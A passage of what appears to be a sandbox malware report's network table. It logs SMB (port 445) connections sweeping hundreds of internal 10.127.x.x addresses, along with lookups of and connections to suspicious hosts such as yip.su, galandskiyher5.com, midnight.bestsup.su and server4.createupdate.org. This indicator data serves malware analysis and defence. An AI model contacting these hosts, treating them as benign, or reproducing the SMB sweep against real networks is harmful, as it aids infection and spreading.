| N/A | 10.127.8.198:445 | tcp | |
| N/A | 10.127.8.219:445 | tcp | |
| N/A | 10.127.9.0:445 | tcp | |
| N/A | 10.127.8.233:445 | tcp | |
| N/A | 10.127.8.221:445 | tcp | |
| N/A | 10.127.8.204:445 | tcp | |
| N/A | 10.127.8.194:445 | tcp | |
| N/A | 10.127.8.197:445 | tcp | |
| N/A | 10.127.8.227:445 | tcp | |
| N/A | 10.127.8.201:445 | tcp | |
| N/A | 10.127.8.226:445 | tcp | |
| N/A | 10.127.8.238:445 | tcp | |
| N/A | 10.127.8.235:445 | tcp | |
| N/A | 10.127.8.237:445 | tcp | |
| N/A | 10.127.8.207:445 | tcp | |
| N/A | 10.127.8.211:445 | tcp | |
| N/A | 10.127.8.216:445 | tcp | |
| N/A | 10.127.8.236:445 | tcp | |
| N/A | 10.127.8.241:445 | tcp | |
| N/A | 10.127.8.252:445 | tcp | |
| N/A | 10.127.8.247:445 | tcp | |
| N/A | 10.127.9.1:445 | tcp | |
| N/A | 10.127.9.47:445 | tcp | |
| N/A | 10.127.9.16:445 | tcp | |
| N/A | 10.127.9.40:445 | tcp | |
| N/A | 10.127.9.54:445 | tcp | |
| N/A | 10.127.9.36:445 | tcp | |
| N/A | 10.127.9.11:445 | tcp | |
| N/A | 10.127.9.61:445 | tcp | |
| N/A | 10.127.9.18:445 | tcp | |
| N/A | 10.127.9.19:445 | tcp | |
| N/A | 10.127.9.5:445 | tcp | |
| N/A | 10.127.9.60:445 | tcp | |
| N/A | 10.127.9.27:445 | tcp | |
| N/A | 10.127.9.28:445 | tcp | |
| N/A | 10.127.9.41:445 | tcp | |
| N/A | 10.127.9.22:445 | tcp | |
| N/A | 10.127.9.46:445 | tcp | |
| N/A | 10.127.9.62:445 | tcp | |
| N/A | 10.127.9.52:445 | tcp | |
| N/A | 10.127.9.9:445 | tcp | |
| N/A | 10.127.9.55:445 | tcp | |
| N/A | 10.127.9.59:445 | tcp | |
| N/A | 10.127.9.21:445 | tcp | |
| N/A | 10.127.9.13:445 | tcp | |
| N/A | 10.127.9.43:445 | tcp | |
| N/A | 10.127.9.45:445 | tcp | |
| N/A | 10.127.9.63:445 | tcp | |
| N/A | 10.127.9.50:445 | tcp | |
| N/A | 10.127.9.8:445 | tcp | |
| N/A | 10.127.9.44:445 | tcp | |
| N/A | 10.127.9.15:445 | tcp | |
| N/A | 10.127.9.26:445 | tcp | |
| N/A | 10.127.9.20:445 | tcp | |
| N/A | 10.127.9.29:445 | tcp | |
| N/A | 10.127.9.51:445 | tcp | |
| N/A | 10.127.9.24:445 | tcp | |
| N/A | 10.127.9.25:445 | tcp | |
| N/A | 10.127.9.10:445 | tcp | |
| N/A | 10.127.9.37:445 | tcp | |
| N/A | 10.127.9.4:445 | tcp | |
| N/A | 10.127.9.33:445 | tcp | |
| N/A | 10.127.9.2:445 | tcp | |
| N/A | 10.127.9.39:445 | tcp | |
| N/A | 10.127.9.34:445 | tcp | |
| N/A | 10.127.9.53:445 | tcp | |
| N/A | 10.127.9.7:445 | tcp | |
| N/A | 10.127.9.35:445 | tcp | |
| N/A | 10.127.9.12:445 | tcp | |
| N/A | 10.127.9.6:445 | tcp | |
| N/A | 10.127.9.14:445 | tcp | |
| N/A | 10.127.9.48:445 | tcp | |
| N/A | 10.127.9.23:445 | tcp | |
| N/A | 10.127.9.17:445 | tcp | |
| N/A | 10.127.9.3:445 | tcp | |
| N/A | 10.127.9.56:445 | tcp | |
| N/A | 10.127.9.42:445 | tcp | |
| N/A | 10.127.9.49:445 | tcp | |
| N/A | 10.127.9.64:445 | tcp | |
| N/A | 10.127.9.31:445 | tcp | |
| N/A | 10.127.9.32:445 | tcp | |
| N/A | 10.127.9.30:445 | tcp | |
| N/A | 10.127.9.58:445 | tcp | |
| N/A | 10.127.9.38:445 | tcp | |
| N/A | 10.127.9.57:445 | tcp | |
| N/A | 10.127.9.65:445 | tcp | |
| N/A | 10.127.9.92:445 | tcp | |
| N/A | 10.127.9.122:445 | tcp | |
| N/A | 10.127.9.84:445 | tcp | |
| N/A | 10.127.9.99:445 | tcp | |
| N/A | 10.127.9.107:445 | tcp | |
| N/A | 10.127.9.81:445 | tcp | |
| N/A | 10.127.9.125:445 | tcp | |
| N/A | 10.127.9.69:445 | tcp | |
| N/A | 10.127.9.95:445 | tcp | |
| N/A | 10.127.9.121:445 | tcp | |
| N/A | 10.127.9.123:445 | tcp | |
| N/A | 10.127.9.75:445 | tcp | |
| N/A | 10.127.9.114:445 | tcp | |
| N/A | 10.127.9.82:445 | tcp | |
| N/A | 10.127.9.86:445 | tcp | |
| N/A | 10.127.9.79:445 | tcp | |
| N/A | 10.127.9.87:445 | tcp | |
| N/A | 10.127.9.90:445 | tcp | |
| N/A | 10.127.9.77:445 | tcp | |
| N/A | 10.127.9.108:445 | tcp | |
| N/A | 10.127.9.101:445 | tcp | |
| N/A | 10.127.9.111:445 | tcp | |
| N/A | 10.127.9.105:445 | tcp | |
| N/A | 10.127.9.71:445 | tcp | |
| N/A | 10.127.9.102:445 | tcp | |
| N/A | 10.127.9.66:445 | tcp | |
| N/A | 10.127.9.103:445 | tcp | |
| N/A | 10.127.9.110:445 | tcp | |
| N/A | 10.127.9.118:445 | tcp | |
| N/A | 10.127.9.120:445 | tcp | |
| N/A | 10.127.9.74:445 | tcp | |
| N/A | 10.127.9.119:445 | tcp | |
| N/A | 10.127.9.68:445 | tcp | |
| N/A | 10.127.9.91:445 | tcp | |
| N/A | 10.127.9.94:445 | tcp | |
| N/A | 10.127.9.70:445 | tcp | |
| N/A | 10.127.9.112:445 | tcp | |
| N/A | 10.127.9.76:445 | tcp | |
| N/A | 10.127.9.83:445 | tcp | |
| N/A | 10.127.9.116:445 | tcp | |
| N/A | 10.127.9.100:445 | tcp | |
| N/A | 10.127.9.85:445 | tcp | |
| N/A | 10.127.9.88:445 | tcp | |
| N/A | 10.127.9.127:445 | tcp | |
| N/A | 10.127.9.117:445 | tcp | |
| N/A | 10.127.9.67:445 | tcp | |
| N/A | 10.127.9.109:445 | tcp | |
| N/A | 10.127.9.96:445 | tcp | |
| N/A | 10.127.9.128:445 | tcp | |
| N/A | 10.127.9.115:445 | tcp | |
| N/A | 10.127.9.89:445 | tcp | |
| N/A | 10.127.9.80:445 | tcp | |
| N/A | 10.127.9.93:445 | tcp | |
| N/A | 10.127.9.98:445 | tcp | |
| N/A | 10.127.9.124:445 | tcp | |
| N/A | 10.127.9.126:445 | tcp | |
| N/A | 10.127.9.73:445 | tcp | |
| N/A | 10.127.9.78:445 | tcp | |
| N/A | 10.127.9.97:445 | tcp | |
| N/A | 10.127.9.104:445 | tcp | |
| N/A | 10.127.9.72:445 | tcp | |
| N/A | 10.127.9.113:445 | tcp | |
| N/A | 10.127.9.106:445 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| N/A | 10.127.9.129:445 | tcp | |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 8.8.8.8:53 | midnight.bestsup.su | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | namecloudvideo.org | udp |
| US | 104.21.65.148:443 | namecloudvideo.org | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | shipbank.org | udp |
| N/A | 10.127.9.130:445 | tcp | |
| US | 172.67.146.202:443 | shipbank.org | tcp |
| US | 15.204.49.148:80 | 15.204.49.148 | tcp |
| US | 172.67.171.112:80 | midnight.bestsup.su | tcp |
| N/A | 10.127.9.139:445 | tcp | |
| N/A | 10.127.9.178:445 | tcp | |
| N/A | 10.127.9.176:445 | tcp | |
| N/A | 10.127.9.190:445 | tcp | |
| N/A | 10.127.9.136:445 | tcp | |
| N/A | 10.127.9.157:445 | tcp | |
| N/A | 10.127.9.159:445 | tcp | |
| N/A | 10.127.9.174:445 | tcp | |
| N/A | 10.127.9.142:445 | tcp | |
| N/A | 10.127.9.185:445 | tcp | |
| N/A | 10.127.9.188:445 | tcp | |
| N/A | 10.127.9.184:445 | tcp | |
| N/A | 10.127.9.179:445 | tcp | |
| N/A | 10.127.9.169:445 | tcp | |
| N/A | 10.127.9.181:445 | tcp | |
| N/A | 10.127.9.163:445 | tcp | |
| N/A | 10.127.9.173:445 | tcp | |
| N/A | 10.127.9.167:445 | tcp | |
| N/A | 10.127.9.175:445 | tcp | |
| N/A | 10.127.9.147:445 | tcp | |
| N/A | 10.127.9.186:445 | tcp | |
| N/A | 10.127.9.182:445 | tcp | |
| N/A | 10.127.9.170:445 | tcp | |
| N/A | 10.127.9.146:445 | tcp | |
| N/A | 10.127.9.183:445 | tcp | |
| N/A | 10.127.9.151:445 | tcp | |
| N/A | 10.127.9.144:445 | tcp | |
| N/A | 10.127.9.158:445 | tcp | |
| N/A | 10.127.9.180:445 | tcp | |
| N/A | 10.127.9.134:445 | tcp | |
| N/A | 10.127.9.191:445 | tcp | |
| N/A | 10.127.9.143:445 | tcp | |
| N/A | 10.127.9.155:445 | tcp | |
| N/A | 10.127.9.149:445 | tcp | |
| N/A | 10.127.9.171:445 | tcp | |
| N/A | 10.127.9.131:445 | tcp | |
| N/A | 10.127.9.189:445 | tcp | |
| N/A | 10.127.9.140:445 | tcp | |
| N/A | 10.127.9.154:445 | tcp | |
| N/A | 10.127.9.132:445 | tcp | |
| N/A | 10.127.9.164:445 | tcp | |
| N/A | 10.127.9.160:445 | tcp | |
| N/A | 10.127.9.177:445 | tcp | |
| N/A | 10.127.9.141:445 | tcp | |
| N/A | 10.127.9.148:445 | tcp | |
| N/A | 10.127.9.150:445 | tcp | |
| N/A | 10.127.9.152:445 | tcp | |
| N/A | 10.127.9.153:445 | tcp | |
| N/A | 10.127.9.166:445 | tcp | |
| N/A | 10.127.9.133:445 | tcp | |
| N/A | 10.127.9.145:445 | tcp | |
| N/A | 10.127.9.192:445 | tcp | |
| N/A | 10.127.9.156:445 | tcp | |
| N/A | 10.127.9.172:445 | tcp | |
| N/A | 10.127.9.135:445 | tcp | |
| N/A | 10.127.9.168:445 | tcp | |
| N/A | 10.127.9.138:445 | tcp | |
| N/A | 10.127.9.187:445 | tcp | |
| N/A | 10.127.9.137:445 | tcp | |
| N/A | 10.127.9.162:445 | tcp | |
| N/A | 10.127.9.165:445 | tcp | |
| N/A | 10.127.9.161:445 | tcp | |
| N/A | 10.127.9.193:445 | tcp | |
| N/A | 10.127.9.194:445 | tcp | |
| N/A | 10.127.9.235:445 | tcp | |
| N/A | 10.127.9.215:445 | tcp | |
| N/A | 10.127.9.226:445 | tcp | |
| N/A | 10.127.9.210:445 | tcp | |
| N/A | 10.127.9.231:445 | tcp | |
| N/A | 10.127.9.244:445 | tcp | |
| N/A | 10.127.9.212:445 | tcp | |
| N/A | 10.127.9.246:445 | tcp | |
| N/A | 10.127.9.238:445 | tcp | |
| N/A | 10.127.9.245:445 | tcp | |
| N/A | 10.127.9.199:445 | tcp | |
| N/A | 10.127.9.198:445 | tcp | |
| N/A | 10.127.9.229:445 | tcp | |
| N/A | 10.127.9.237:445 | tcp | |
| N/A | 10.127.9.207:445 | tcp | |
| N/A | 10.127.9.220:445 | tcp | |
| N/A | 10.127.9.201:445 | tcp | |
| N/A | 10.127.9.213:445 | tcp | |
| N/A | 10.127.9.218:445 | tcp | |
| N/A | 10.127.9.227:445 | tcp | |
| N/A | 10.127.9.251:445 | tcp | |
| N/A | 10.127.9.204:445 | tcp | |
| N/A | 10.127.9.233:445 | tcp | |
| N/A | 10.127.9.196:445 | tcp | |
| N/A | 10.127.9.222:445 | tcp | |
| N/A | 10.127.9.228:445 | tcp | |
| N/A | 10.127.9.206:445 | tcp | |
| N/A | 10.127.9.216:445 | tcp | |
| N/A | 10.127.9.200:445 | tcp | |
| N/A | 10.127.9.224:445 | tcp | |
| N/A | 10.127.9.203:445 | tcp | |
| N/A | 10.127.9.230:445 | tcp | |
| N/A | 10.127.9.243:445 | tcp | |
| N/A | 10.127.9.254:445 | tcp | |
| N/A | 10.127.9.240:445 | tcp | |
| N/A | 10.127.9.223:445 | tcp | |
| N/A | 10.127.9.253:445 | tcp | |
| N/A | 10.127.9.249:445 | tcp | |
| N/A | 10.127.9.255:445 | tcp | |
| N/A | 10.127.9.250:445 | tcp | |
| N/A | 10.127.9.252:445 | tcp | |
| N/A | 10.127.9.208:445 | tcp | |
| N/A | 10.127.9.242:445 | tcp | |
| N/A | 10.127.9.247:445 | tcp | |
| N/A | 10.127.9.232:445 | tcp | |
| N/A | 10.127.9.197:445 | tcp | |
| N/A | 10.127.9.248:445 | tcp | |
| N/A | 10.127.9.211:445 | tcp | |
| N/A | 10.127.9.205:445 | tcp | |
| N/A | 10.127.9.234:445 | tcp | |
| N/A | 10.127.9.214:445 | tcp | |
| N/A | 10.127.9.217:445 | tcp | |
| N/A | 10.127.9.236:445 | tcp | |
| N/A | 10.127.9.202:445 | tcp | |
| N/A | 10.127.9.195:445 | tcp | |
| N/A | 10.127.9.239:445 | tcp | |
| N/A | 10.127.9.241:445 | tcp | |
| N/A | 10.127.9.219:445 | tcp | |
| N/A | 10.127.9.225:445 | tcp | |
| N/A | 10.127.10.0:445 | tcp | |
| N/A | 10.127.9.209:445 | tcp | |
| N/A | 10.127.9.221:445 | tcp | |
| N/A | 10.127.10.1:445 | tcp | |
| N/A | 10.127.10.2:445 | tcp | |
| N/A | 10.127.10.12:445 | tcp | |
| N/A | 10.127.10.24:445 | tcp | |
| N/A | 10.127.10.15:445 | tcp | |
| N/A | 10.127.10.40:445 | tcp | |
| N/A | 10.127.10.23:445 | tcp | |
| N/A | 10.127.10.29:445 | tcp | |
| N/A | 10.127.10.62:445 | tcp | |
| N/A | 10.127.10.6:445 | tcp | |
| N/A | 10.127.10.58:445 | tcp | |
| N/A | 10.127.10.63:445 | tcp | |
| N/A | 10.127.10.19:445 | tcp | |
| N/A | 10.127.10.33:445 | tcp | |
| N/A | 10.127.10.64:445 | tcp | |
| N/A | 10.127.10.5:445 | tcp | |
| N/A | 10.127.10.36:445 | tcp | |
| N/A | 10.127.10.9:445 | tcp | |
| N/A | 10.127.10.60:445 | tcp | |
| N/A | 10.127.10.30:445 | tcp | |
| N/A | 10.127.10.48:445 | tcp | |
| N/A | 10.127.10.51:445 | tcp | |
| N/A | 10.127.10.11:445 | tcp | |
| N/A | 10.127.10.13:445 | tcp | |
| N/A | 10.127.10.18:445 | tcp | |
| N/A | 10.127.10.26:445 | tcp | |
| N/A | 10.127.10.34:445 | tcp | |
| N/A | 10.127.10.46:445 | tcp | |
| N/A | 10.127.10.21:445 | tcp | |
| N/A | 10.127.10.10:445 | tcp | |
| N/A | 10.127.10.53:445 | tcp | |
| N/A | 10.127.10.4:445 | tcp | |
| N/A | 10.127.10.16:445 | tcp | |
| N/A | 10.127.10.20:445 | tcp | |
| N/A | 10.127.10.25:445 | tcp | |
| N/A | 10.127.10.7:445 | tcp | |
| N/A | 10.127.10.8:445 | tcp | |
| N/A | 10.127.10.14:445 | tcp | |
| N/A | 10.127.10.28:445 | tcp | |
| N/A | 10.127.10.61:445 | tcp | |
| N/A | 10.127.10.32:445 | tcp | |
| N/A | 10.127.10.42:445 | tcp | |
| N/A | 10.127.10.37:445 | tcp | |
| N/A | 10.127.10.50:445 | tcp | |
| N/A | 10.127.10.55:445 | tcp | |
| N/A | 10.127.10.59:445 | tcp | |
| N/A | 10.127.10.27:445 | tcp | |
| N/A | 10.127.10.49:445 | tcp | |
| N/A | 10.127.10.65:445 | tcp | |
| N/A | 10.127.10.31:445 | tcp | |
| N/A | 10.127.10.43:445 | tcp | |
| N/A | 10.127.10.22:445 | tcp | |
| N/A | 10.127.10.56:445 | tcp | |
| N/A | 10.127.10.17:445 | tcp | |
| N/A | 10.127.10.3:445 | tcp | |
| N/A | 10.127.10.52:445 | tcp | |
| N/A | 10.127.10.38:445 | tcp | |
| N/A | 10.127.10.39:445 | tcp | |
| N/A | 10.127.10.47:445 | tcp | |
| N/A | 10.127.10.57:445 | tcp | |
| N/A | 10.127.10.35:445 | tcp | |
| N/A | 10.127.10.45:445 | tcp | |
| N/A | 10.127.10.54:445 | tcp | |
| N/A | 10.127.10.41:445 | tcp | |
| N/A | 10.127.10.44:445 | tcp | |
| N/A | 10.127.10.66:445 | tcp | |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| N/A | 10.127.10.76:445 | tcp | |
| N/A | 10.127.10.97:445 | tcp | |
| N/A | 10.127.10.128:445 | tcp | |
| N/A | 10.127.10.114:445 | tcp | |
| N/A | 10.127.10.122:445 | tcp | |
| N/A | 10.127.10.98:445 | tcp | |
| N/A | 10.127.10.113:445 | tcp | |
| N/A | 10.127.10.123:445 | tcp | |
| N/A | 10.127.10.96:445 | tcp | |
| N/A | 10.127.10.82:445 | tcp | |
| N/A | 10.127.10.119:445 | tcp | |
| N/A | 10.127.10.79:445 | tcp | |
| N/A | 10.127.10.67:445 | tcp | |
| N/A | 10.127.10.108:445 | tcp | |
| N/A | 10.127.10.120:445 | tcp | |
| N/A | 10.127.10.83:445 | tcp | |
| N/A | 10.127.10.105:445 | tcp | |
| N/A | 10.127.10.88:445 | tcp | |
| N/A | 10.127.10.125:445 | tcp | |
| N/A | 10.127.10.69:445 | tcp | |
| N/A | 10.127.10.124:445 | tcp | |
| N/A | 10.127.10.101:445 | tcp | |
| N/A | 10.127.10.71:445 | tcp | |
| N/A | 10.127.10.121:445 | tcp | |
| N/A | 10.127.10.89:445 | tcp | |
| N/A | 10.127.10.86:445 | tcp | |
| N/A | 10.127.10.109:445 | tcp | |
| N/A | 10.127.10.116:445 | tcp | |
| N/A | 10.127.10.107:445 | tcp | |
| N/A | 10.127.10.110:445 | tcp | |
| N/A | 10.127.10.99:445 | tcp | |
| N/A | 10.127.10.126:445 | tcp | |
| N/A | 10.127.10.75:445 | tcp | |
| N/A | 10.127.10.91:445 | tcp | |
| N/A | 10.127.10.92:445 | tcp | |
| N/A | 10.127.10.117:445 | tcp | |
| N/A | 10.127.10.103:445 | tcp | |
| N/A | 10.127.10.74:445 | tcp | |
| N/A | 10.127.10.70:445 | tcp | |
| N/A | 10.127.10.81:445 | tcp | |
| N/A | 10.127.10.95:445 | tcp | |
| N/A | 10.127.10.102:445 | tcp | |
| N/A | 10.127.10.100:445 | tcp | |
| N/A | 10.127.10.78:445 | tcp | |
| N/A | 10.127.10.84:445 | tcp | |
| N/A | 10.127.10.94:445 | tcp | |
| N/A | 10.127.10.87:445 | tcp | |
| N/A | 10.127.10.112:445 | tcp | |
| N/A | 10.127.10.90:445 | tcp | |
| N/A | 10.127.10.104:445 | tcp | |
| N/A | 10.127.10.130:445 | tcp | |
| N/A | 10.127.10.129:445 | tcp | |
| N/A | 10.127.10.73:445 | tcp | |
| N/A | 10.127.10.72:445 | tcp | |
| N/A | 10.127.10.93:445 | tcp | |
| N/A | 10.127.10.127:445 | tcp | |
| N/A | 10.127.10.111:445 | tcp | |
| N/A | 10.127.10.68:445 | tcp | |
| N/A | 10.127.10.106:445 | tcp | |
| N/A | 10.127.10.115:445 | tcp | |
| N/A | 10.127.10.85:445 | tcp | |
| N/A | 10.127.10.118:445 | tcp | |
| N/A | 10.127.10.80:445 | tcp | |
| N/A | 10.127.10.77:445 | tcp | |
| N/A | 10.127.10.131:445 | tcp | |
| N/A | 10.127.10.149:445 | tcp | |
| N/A | 10.127.10.143:445 | tcp | |
| N/A | 10.127.10.140:445 | tcp | |
| N/A | 10.127.10.159:445 | tcp | |
| N/A | 10.127.10.160:445 | tcp | |
| N/A | 10.127.10.141:445 | tcp | |
| N/A | 10.127.10.178:445 | tcp | |
| N/A | 10.127.10.190:445 | tcp | |
| N/A | 10.127.10.169:445 | tcp | |
| N/A | 10.127.10.167:445 | tcp | |
| N/A | 10.127.10.193:445 | tcp | |
| N/A | 10.127.10.158:445 | tcp | |
| N/A | 10.127.10.146:445 | tcp | |
| N/A | 10.127.10.162:445 | tcp | |
| N/A | 10.127.10.172:445 | tcp | |
| N/A | 10.127.10.168:445 | tcp | |
| N/A | 10.127.10.136:445 | tcp | |
| N/A | 10.127.10.139:445 | tcp | |
| N/A | 10.127.10.183:445 | tcp | |
| N/A | 10.127.10.177:445 | tcp | |
| N/A | 10.127.10.182:445 | tcp | |
| N/A | 10.127.10.152:445 | tcp | |
| N/A | 10.127.10.187:445 | tcp | |
| N/A | 10.127.10.135:445 | tcp | |
| N/A | 10.127.10.142:445 | tcp | |
| N/A | 10.127.10.181:445 | tcp | |
| N/A | 10.127.10.186:445 | tcp | |
| N/A | 10.127.10.189:445 | tcp | |
| N/A | 10.127.10.134:445 | tcp | |
| N/A | 10.127.10.138:445 | tcp | |
| N/A | 10.127.10.170:445 | tcp | |
| N/A | 10.127.10.179:445 | tcp | |
| N/A | 10.127.10.156:445 | tcp | |
| N/A | 10.127.10.133:445 | tcp | |
| N/A | 10.127.10.175:445 | tcp | |
| N/A | 10.127.10.164:445 | tcp | |
| N/A | 10.127.10.155:445 | tcp | |
| N/A | 10.127.10.194:445 | tcp | |
| N/A | 10.127.10.173:445 | tcp | |
| N/A | 10.127.10.153:445 | tcp | |
| N/A | 10.127.10.157:445 | tcp | |
| N/A | 10.127.10.150:445 | tcp | |
| N/A | 10.127.10.191:445 | tcp | |
| N/A | 10.127.10.188:445 | tcp | |
| N/A | 10.127.10.161:445 | tcp | |
| N/A | 10.127.10.145:445 | tcp | |
| N/A | 10.127.10.154:445 | tcp | |
| N/A | 10.127.10.166:445 | tcp | |
| N/A | 10.127.10.148:445 | tcp | |
| N/A | 10.127.10.151:445 | tcp | |
| N/A | 10.127.10.174:445 | tcp | |
| N/A | 10.127.10.171:445 | tcp | |
| N/A | 10.127.10.176:445 | tcp | |
| N/A | 10.127.10.184:445 | tcp | |
| N/A | 10.127.10.132:445 | tcp | |
| N/A | 10.127.10.180:445 | tcp | |
| N/A | 10.127.10.185:445 | tcp | |
| N/A | 10.127.10.147:445 | tcp | |
| N/A | 10.127.10.137:445 | tcp | |
| N/A | 10.127.10.163:445 | tcp | |
| N/A | 10.127.10.192:445 | tcp | |
| N/A | 10.127.10.165:445 | tcp | |
| N/A | 10.127.10.144:445 | tcp | |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| N/A | 10.127.10.195:445 | tcp | |
| N/A | 10.127.10.237:445 | tcp | |
| N/A | 10.127.11.0:445 | tcp | |
| N/A | 10.127.10.248:445 | tcp | |
| N/A | 10.127.10.213:445 | tcp | |
| N/A | 10.127.10.240:445 | tcp | |
| N/A | 10.127.10.196:445 | tcp | |
| N/A | 10.127.10.220:445 | tcp | |
| N/A | 10.127.10.234:445 | tcp | |
| N/A | 10.127.10.200:445 | tcp | |
| N/A | 10.127.10.247:445 | tcp | |
| N/A | 10.127.10.215:445 | tcp | |
| N/A | 10.127.10.255:445 | tcp | |
| N/A | 10.127.10.210:445 | tcp | |
| N/A | 10.127.10.216:445 | tcp | |
| N/A | 10.127.10.201:445 | tcp | |
| N/A | 10.127.10.226:445 | tcp | |
| N/A | 10.127.10.239:445 | tcp | |
| N/A | 10.127.10.197:445 | tcp | |
| N/A | 10.127.10.250:445 | tcp | |
| N/A | 10.127.10.235:445 | tcp | |
| N/A | 10.127.10.252:445 | tcp | |
| N/A | 10.127.10.207:445 | tcp | |
| N/A | 10.127.10.217:445 | tcp | |
| N/A | 10.127.10.225:445 | tcp | |
| N/A | 10.127.10.223:445 | tcp | |
| N/A | 10.127.10.221:445 | tcp | |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| N/A | 10.127.10.228:445 | tcp | |
| N/A | 10.127.10.198:445 | tcp | |
| N/A | 10.127.10.245:445 | tcp | |
| N/A | 10.127.10.211:445 | tcp | |
| N/A | 10.127.10.204:445 | tcp | |
| N/A | 10.127.10.238:445 | tcp | |
| N/A | 10.127.10.241:445 | tcp | |
| N/A | 10.127.10.208:445 | tcp | |
| N/A | 10.127.10.231:445 | tcp | |
| N/A | 10.127.10.254:445 | tcp | |
| N/A | 10.127.10.205:445 | tcp | |
| N/A | 10.127.10.214:445 | tcp | |
| N/A | 10.127.10.246:445 | tcp | |
| N/A | 10.127.10.203:445 | tcp | |
| N/A | 10.127.10.232:445 | tcp | |
| N/A | 10.127.10.251:445 | tcp | |
| N/A | 10.127.10.249:445 | tcp | |
| N/A | 10.127.10.206:445 | tcp | |
| N/A | 10.127.10.224:445 | tcp | |
| N/A | 10.127.10.222:445 | tcp | |
| N/A | 10.127.10.233:445 | tcp | |
| N/A | 10.127.10.212:445 | tcp | |
| N/A | 10.127.10.244:445 | tcp | |
| N/A | 10.127.10.202:445 | tcp | |
| N/A | 10.127.10.242:445 | tcp | |
| N/A | 10.127.11.1:445 | tcp | |
| N/A | 10.127.10.236:445 | tcp | |
| N/A | 10.127.10.230:445 | tcp | |
| N/A | 10.127.10.199:445 | tcp | |
| N/A | 10.127.10.209:445 | tcp | |
| N/A | 10.127.10.243:445 | tcp | |
| N/A | 10.127.11.2:445 | tcp | |
| N/A | 10.127.10.219:445 | tcp | |
| N/A | 10.127.10.253:445 | tcp | |
| N/A | 10.127.10.229:445 | tcp | |
| N/A | 10.127.10.218:445 | tcp | |
| N/A | 10.127.10.227:445 | tcp | |
| N/A | 10.127.11.66:445 | tcp | |
| N/A | 10.127.11.14:445 | tcp | |
| N/A | 10.127.11.44:445 | tcp | |
| N/A | 10.127.11.8:445 | tcp | |
| N/A | 10.127.11.40:445 | tcp | |
| N/A | 10.127.11.35:445 | tcp | |
| N/A | 10.127.11.20:445 | tcp | |
| N/A | 10.127.11.45:445 | tcp | |
| N/A | 10.127.11.25:445 | tcp | |
| N/A | 10.127.11.51:445 | tcp | |
| N/A | 10.127.11.29:445 | tcp | |
| N/A | 10.127.11.41:445 | tcp | |
| N/A | 10.127.11.43:445 | tcp | |
| N/A | 10.127.11.36:445 | tcp | |
| N/A | 10.127.11.42:445 | tcp | |
| N/A | 10.127.11.17:445 | tcp | |
| N/A | 10.127.11.28:445 | tcp | |
| N/A | 10.127.11.26:445 | tcp | |
| N/A | 10.127.11.47:445 | tcp | |
| N/A | 10.127.11.58:445 | tcp | |
| N/A | 10.127.11.30:445 | tcp | |
| N/A | 10.127.11.64:445 | tcp | |
| N/A | 10.127.11.18:445 | tcp | |
| N/A | 10.127.11.49:445 | tcp | |
| N/A | 10.127.11.61:445 | tcp | |
| N/A | 10.127.11.31:445 | tcp | |
| N/A | 10.127.11.22:445 | tcp | |
| N/A | 10.127.11.56:445 | tcp | |
| N/A | 10.127.11.62:445 | tcp | |
| N/A | 10.127.11.7:445 | tcp | |
| N/A | 10.127.11.63:445 | tcp | |
| N/A | 10.127.11.59:445 | tcp | |
| N/A | 10.127.11.12:445 | tcp | |
| N/A | 10.127.11.55:445 | tcp | |
| N/A | 10.127.11.16:445 | tcp | |
| N/A | 10.127.11.48:445 | tcp | |
| N/A | 10.127.11.52:445 | tcp | |
| N/A | 10.127.11.65:445 | tcp | |
| N/A | 10.127.11.3:445 | tcp | |
| N/A | 10.127.11.21:445 | tcp | |
| N/A | 10.127.11.57:445 | tcp | |
| N/A | 10.127.11.4:445 | tcp | |
| N/A | 10.127.11.33:445 | tcp | |
| N/A | 10.127.11.54:445 | tcp | |
| N/A | 10.127.11.10:445 | tcp | |
| N/A | 10.127.11.13:445 | tcp | |
| N/A | 10.127.11.15:445 | tcp | |
| N/A | 10.127.11.23:445 | tcp | |
| N/A | 10.127.11.39:445 | tcp | |
| N/A | 10.127.11.5:445 | tcp | |
| N/A | 10.127.11.34:445 | tcp | |
| N/A | 10.127.11.37:445 | tcp | |
| N/A | 10.127.11.6:445 | tcp | |
| N/A | 10.127.11.32:445 | tcp | |
| N/A | 10.127.11.50:445 | tcp | |
| N/A | 10.127.11.11:445 | tcp | |
| N/A | 10.127.11.19:445 | tcp | |
| N/A | 10.127.11.24:445 | tcp | |
| N/A | 10.127.11.9:445 | tcp | |
| N/A | 10.127.11.46:445 | tcp | |
| N/A | 10.127.11.60:445 | tcp | |
| N/A | 10.127.11.27:445 | tcp | |
| N/A | 10.127.11.38:445 | tcp | |
| N/A | 10.127.11.53:445 | tcp | |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| HK | 141.98.234.31:53 | bmoarca.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| N/A | 10.127.11.67:445 | tcp | |
| N/A | 10.127.11.84:445 | tcp | |
| N/A | 10.127.11.79:445 | tcp | |
| N/A | 10.127.11.73:445 | tcp | |
| N/A | 10.127.11.76:445 | tcp | |
| N/A | 10.127.11.85:445 | tcp | |
| N/A | 10.127.11.68:445 | tcp | |
| N/A | 10.127.11.70:445 | tcp | |
| N/A | 10.127.11.90:445 | tcp | |
| N/A | 10.127.11.97:445 | tcp | |
| N/A | 10.127.11.129:445 | tcp | |
| N/A | 10.127.11.94:445 | tcp | |
| N/A | 10.127.11.127:445 | tcp | |
| N/A | 10.127.11.75:445 | tcp | |
| N/A | 10.127.11.82:445 | tcp | |
| N/A | 10.127.11.130:445 | tcp | |
| N/A | 10.127.11.113:445 | tcp | |
| N/A | 10.127.11.92:445 | tcp | |
| N/A | 10.127.11.125:445 | tcp | |
| N/A | 10.127.11.101:445 | tcp | |
| N/A | 10.127.11.72:445 | tcp | |
| N/A | 10.127.11.107:445 | tcp | |
| N/A | 10.127.11.74:445 | tcp | |
| N/A | 10.127.11.121:445 | tcp | |
